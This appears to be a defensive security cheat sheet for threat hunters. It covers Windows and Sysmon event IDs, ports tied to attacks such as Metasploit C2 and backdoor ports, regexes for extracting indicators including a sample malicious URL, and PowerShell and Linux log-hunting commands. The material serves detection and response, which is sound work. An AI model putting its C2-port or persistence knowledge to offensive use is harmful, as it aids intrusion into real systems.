SECURITY CHEAT SHEETS

Quick reference for threat hunters and incident responders

REFERENCE ACTIVE
SEARCHABLE DATABASE
COPY-PASTE READY
WINDOWS EVENT IDs
SYSMON EVENTS
COMMON PORTS
REGEX PATTERNS
POWERSHELL
LINUX LOGS

>> CRITICAL WINDOWS SECURITY EVENT IDs


Account Logon Events

Event ID Description Severity Hunt Use Case
4624 An account was successfully logged on MEDIUM Track user logons, identify lateral movement
4625 An account failed to log on HIGH Brute force attempts, password spraying
4634 An account was logged off MEDIUM Session duration analysis
4648 A logon was attempted using explicit credentials HIGH Lateral movement, privilege escalation
4672 Special privileges assigned to new logon HIGH Admin logon detection

Logon Types Reference

Type Description Typical Use
2 Interactive Console logon, physical access
3 Network SMB, file shares, remote access
4 Batch Scheduled tasks
5 Service Service startup
7 Unlock Workstation unlock
10 RemoteInteractive RDP, Terminal Services
11 CachedInteractive Cached credentials (offline)

Process & Service Events

Event ID Description Severity Hunt Use Case
4688 A new process has been created CRITICAL Process execution tracking, command line analysis
4689 A process has exited MEDIUM Process lifetime analysis
7045 A service was installed in the system CRITICAL Persistence, malware service installation
4697 A service was installed in the system CRITICAL Alternative to 7045, persistence detection

Account Management

Event ID Description Severity
4720 A user account was created HIGH
4722 A user account was enabled HIGH
4724 An attempt was made to reset an account's password HIGH
4728 A member was added to a security-enabled global group CRITICAL
4732 A member was added to a security-enabled local group CRITICAL
4756 A member was added to a security-enabled universal group CRITICAL
💡 PRO TIP: Enable command line logging (Event 4688) via GPO: Computer Configuration → Administrative Templates → System → Audit Process Creation → Include command line in process creation events

>> SYSMON EVENT IDs


Event ID Description Key Fields Hunt Value
1 Process Creation CommandLine, ParentImage, Hashes CRITICAL
3 Network Connection DestinationIp, DestinationPort, Image CRITICAL
7 Image Loaded (DLL) ImageLoaded, Signed, Signature HIGH
8 CreateRemoteThread SourceImage, TargetImage CRITICAL
10 Process Access SourceImage, TargetImage, GrantedAccess HIGH
11 File Created TargetFilename, Image MEDIUM
12/13/14 Registry Events TargetObject, Image, Details HIGH
15 File Stream Created TargetFilename, Contents (ADS) MEDIUM
22 DNS Query QueryName, Image HIGH
💡 RECOMMENDED: Use Sysmon-modular config from olafhartong/sysmon-modular for comprehensive coverage with MITRE ATT&CK mapping

>> COMMON PORTS & ATTACK VECTORS


Suspicious Outbound Ports

Port Service Attack Vector Hunt Priority
22 SSH Remote access, tunneling, data exfiltration CRITICAL
23 Telnet Unencrypted remote access, legacy systems HIGH
3389 RDP Lateral movement, ransomware deployment CRITICAL
445 SMB EternalBlue, lateral movement, file exfil CRITICAL
1433 MSSQL SQL injection, data theft HIGH
3306 MySQL Database attacks, credential theft HIGH
5900 VNC Remote desktop access HIGH
4444 Metasploit Common C2 port for Metasploit CRITICAL
8080 HTTP-Alt C2 communication, web proxies MEDIUM
53 DNS DNS tunneling, C2 beaconing HIGH

High-Risk Port Ranges

Range Description Why Suspicious
1024-5000 Dynamic/Private Ports Often used by malware for C2
4444, 5555, 6666 Common Hacker Ports Frequently used in pentesting/malware
31337, 27374 Backdoor Ports Classic backdoor/remote access tools

>> USEFUL REGEX PATTERNS


IOC Extraction

IPv4 Address:
\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b
Example match: 192.168.1.1, 10.0.0.1
Email Address:
[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}
Example match: user@example.com, admin@malicious-site.xyz
URL/Domain:
https?://[^\s<>"{}|\\^`\[\]]+
Example match: http://evil-site.com/payload.exe
MD5 Hash:
\b[a-fA-F0-9]{32}\b
Example match: 5d41402abc4b2a76b9719d911017c592
SHA256 Hash:
\b[a-fA-F0-9]{64}\b
Example match: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Windows File Path:
[a-zA-Z]:\\(?:[^\\/:*?"<>|\r\n]+\\)*[^\\/:*?"<>|\r\n]*
Example match: C:\Windows\System32\cmd.exe
Base64 (minimum 20 chars):
(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?
Useful for detecting encoded payloads

>> POWERSHELL HUNTING COMMANDS


Get Security Event Logs (Last 24h):
Get-WinEvent -FilterHashtable @{LogName='Security'; StartTime=(Get-Date).AddDays(-1)} | Select TimeCreated, Id, Message
Find Failed Logon Attempts:
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} | Select TimeCreated, @{N='User';E={$_.Properties[5].Value}}, @{N='WorkStation';E={$_.Properties[13].Value}}
List Running Processes with Network Connections:
Get-NetTCPConnection | Select LocalAddress, LocalPort, RemoteAddress, RemotePort, State, @{Name="Process";Expression={(Get-Process -Id $_.OwningProcess).ProcessName}}
Find Suspicious Scheduled Tasks:
Get-ScheduledTask | Where-Object {$_.Principal.UserId -eq "SYSTEM" -and $_.Actions.Execute -match "powershell|cmd"} | Select TaskName, Actions
List Services with Unusual Paths:
Get-WmiObject Win32_Service | Where-Object {$_.PathName -notmatch "system32" -and $_.State -eq "Running"} | Select Name, PathName, State
Check for Persistence (Registry Run Keys):
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run", "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"

>> LINUX LOG LOCATIONS & COMMANDS


Critical Log Files

Log File Description Key Events
/var/log/auth.log Authentication attempts (Debian/Ubuntu) SSH logins, sudo usage, failed auth
/var/log/secure Authentication attempts (RHEL/CentOS) SSH logins, sudo usage, failed auth
/var/log/syslog System-wide messages Service starts, system events
/var/log/messages General system messages (RHEL) Kernel, system services
/var/log/audit/audit.log SELinux/auditd events File access, system calls
~/.bash_history User command history Commands executed by user

Common Hunting Commands

Find Failed SSH Attempts:
grep "Failed password" /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn
List Successful SSH Logins:
grep "Accepted" /var/log/auth.log | awk '{print $1, $2, $3, $9, $11}'
Find Recently Modified Files:
find /tmp /var/tmp /dev/shm -type f -mtime -1 -ls
List Listening Ports:
netstat -tulpn | grep LISTEN
Check for Suspicious Cron Jobs:
cat /etc/crontab /var/spool/cron/* /etc/cron.d/* 2>/dev/null
Find SUID/SGID Files:
find / -perm -4000 -o -perm -2000 2>/dev/null